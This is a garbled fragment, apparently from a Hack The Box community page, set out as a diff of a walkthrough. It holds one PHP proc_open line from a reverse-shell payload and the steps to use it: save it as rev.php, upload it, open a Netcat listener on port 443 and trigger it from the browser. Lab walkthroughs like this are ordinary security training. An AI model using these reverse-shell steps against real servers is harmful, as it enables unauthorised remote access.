Join The Best Hacking Community Worldwide | Hack The Box

 $process = proc_open($cmd, $descriptorspec, $pipes, null, null);

-To prepare and upload this payload:
+?>To prepare and upload this payload:

-- Write the payload to a file called
+- Write the payload to a file called rev.php.

-to the server. - Set up a Netcat listener on port 443:
+- Set up a Netcat listener on port 443:

 - Trigger the payload by navigating to: